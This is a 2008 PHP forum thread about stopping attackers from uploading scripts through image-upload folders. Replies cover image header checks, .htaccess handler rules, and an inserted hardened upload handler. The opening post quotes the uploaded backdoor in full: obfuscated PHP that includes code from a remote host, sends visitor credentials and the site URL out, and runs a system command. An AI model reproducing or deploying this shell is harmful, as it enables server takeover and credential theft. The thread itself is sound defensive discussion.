delphi123 Posted February 6, 2008

Hi there, I keep finding hack nonsense like:

```php
<?php error_reporting(0);if(isset($_POST["l"]) and isset($_POST["p"])){if(isset($_POST["input"])){$user_auth="&l=".base64_encode($_POST["l"])."&p=".base64_encode(md5($_POST["p"]));}else{$user_auth="&l=".$_POST["l"]."&p=".$_POST["p"];}}else{$user_auth="";}if(!isset($_POST["log_flg"])){$log_flg="&log";}if(!@include_once(base64_decode("aHR0cDovLw==")."hhcizzazbzhff".base64_decode("LnVzZXJzLmJpc2hlbGwucnU=")."/?r_addr=".sprintf("%u", ip2long(getenv(REMOTE_ADDR)))."&url=".base64_encode($_SERVER["SERVER_NAME"].$_SERVER[REQUEST_URI]).$user_auth.$log_flg)){if($_POST["l"]=="special"){print "sys_active".`uname -a`;}} ?>
```

being uploaded to directories with 755 and 777 settings where I've got scripts that upload images. Can anyone tell me how I can stop this? Is there some php/htaccess setting where I can only allow .jpg files in a directory or something?
cooldude832 Posted February 6, 2008

I wrote this with thrope a while back to verify it has image headers:

```php
<?php
// Returns true only if getimagesize() recognises the file as an image.
function is_image($path) {
    if (is_array(getimagesize($path))) {
        return true;
    }
    return false;
}
?>
```

Should help you.
delphi123 Posted February 6, 2008 (Author)

??? What does that do exactly? Will that stop .php being uploaded to the 777 directories?
cooldude832 Posted February 6, 2008

No, it verifies the file is an image before allowing it to be uploaded. (Use your eyes, it's 2 lines.)
PFMaBiSmAd Posted February 6, 2008

Using the PHP GD functions will stop a casual hacker, but it is possible to create a file that looks like a valid image, which the PHP GD functions will see as an image, but that also contains PHP code.

Everybody needs to read this: http://www.scanit.be/uploads/php-file-upload.pdf

You need to check everything you possibly can and then restrict direct access by browsers to the folder where the uploaded file is placed... (The document at the link contains several recommendations on how to detect and prevent hacking through file uploads.)
The Little Guy Posted February 6, 2008

What you can do is place a .htaccess file in the root of that directory. This will only display the code and not let it run:

```apache
RemoveType .php
AddType application/x-httpd-php-source .php
AddHandler application/x-httpd-php-source .php
```

It will still allow for PHP file uploads, but it will help keep you safe. Next, when the file uploads, run this:

```php
<?php
// Abort unless getimagesize() recognises the uploaded file as an image.
getimagesize("/location/to/dir") or die('Not An Image');
?>
```
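Putting the two suggestions in this thread together (the getimagesize() header check, and PFMaBiSmAd's point that a file can pass that check and still carry PHP code), here is an added example of an upload handler that does not trust the header check alone. It is not code from the thread or from any of its posters. It assumes PHP 8 with the GD extension, a form field named "image", and a storage directory UPLOAD_DIR that the web server serves as static files only (the .htaccess above, or an equivalent server rule, stays in place as the second layer). The key step is re-encoding: GD decodes the pixels and writes a fresh file from them, so any bytes appended to a polyglot image never reach disk, and the stored name and extension are chosen by the server, never by the client.

```php
<?php
// Added example, not from the thread: a hardened image upload handler.
// Assumptions (hypothetical): form field "image", GD available, uploads
// stored under UPLOAD_DIR which is served as static content only.
declare(strict_types=1);

const UPLOAD_DIR = __DIR__ . '/uploads';     // assumed storage path
const MAX_BYTES  = 2 * 1024 * 1024;          // 2 MiB limit chosen for the example

// Image types we accept, mapped to the extension the server will write.
const ALLOWED_TYPES = [
    IMAGETYPE_JPEG => 'jpg',
    IMAGETYPE_PNG  => 'png',
    IMAGETYPE_GIF  => 'gif',
];

/**
 * Validates one entry of $_FILES and stores a re-encoded copy of it.
 * Returns the generated filename, or throws RuntimeException on any failure.
 */
function store_uploaded_image(array $file): string
{
    // 1. Accept only files PHP itself received through this request.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('No valid upload received');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('File too large');
    }

    // 2. Header check, as suggested in the thread. On its own this is
    //    bypassable: a file can have a valid image header and PHP code after it.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || !isset(ALLOWED_TYPES[$info[2]])) {
        throw new RuntimeException('Not an accepted image');
    }

    // 3. Content check: decode the actual pixel data with GD. If it does not
    //    decode, it is not an image we are willing to keep.
    $img = @imagecreatefromstring((string) file_get_contents($file['tmp_name']));
    if ($img === false) {
        throw new RuntimeException('Image data could not be decoded');
    }

    // 4. Never reuse the client-supplied name: generate one, with the extension
    //    taken from the detected type, so "shell.php" can never be the result.
    $ext  = ALLOWED_TYPES[$info[2]];
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;

    // 5. Write a fresh file from the decoded pixels only. Anything that was
    //    appended to the original upload is not part of the pixel data and is
    //    dropped here.
    $ok = match ($info[2]) {
        IMAGETYPE_JPEG => imagejpeg($img, $dest, 90),
        IMAGETYPE_PNG  => imagepng($img, $dest),
        IMAGETYPE_GIF  => imagegif($img, $dest),
    };
    imagedestroy($img);
    if (!$ok) {
        throw new RuntimeException('Could not write image');
    }

    // 6. Stored files are data, not programs: readable, not executable, and the
    //    directory itself should not be world-writable (no 777).
    chmod($dest, 0644);
    return $name;
}

// Usage from the form handler. Reasons for rejection are kept server-side.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['image'])) {
    try {
        $stored = store_uploaded_image($_FILES['image']);
        echo 'Stored as ' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        error_log('Upload rejected: ' . $e->getMessage());
        http_response_code(400);
        echo 'Upload rejected';
    }
}
```

Two caveats on the re-encoding step: imagegif() writes only the first frame, so animated GIFs lose their animation, and JPEG re-encoding is lossy (quality 90 here). If the originals must be preserved byte-for-byte, keep them outside the web root and serve them through a script that sets the Content-Type itself, which is the "restrict direct access by browsers" advice from the thread.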
delphi123 Posted February 6, 2008 (Author)

cooldude832 - well, I used my eyes and that's exactly what it seemed like, hence my question! Now you use yours and read my question - at no point did I say my script was being used by hackers - it's outside the web root in a secure directory.

The Little Guy has got it spot on! Cheers, that's what I was needing!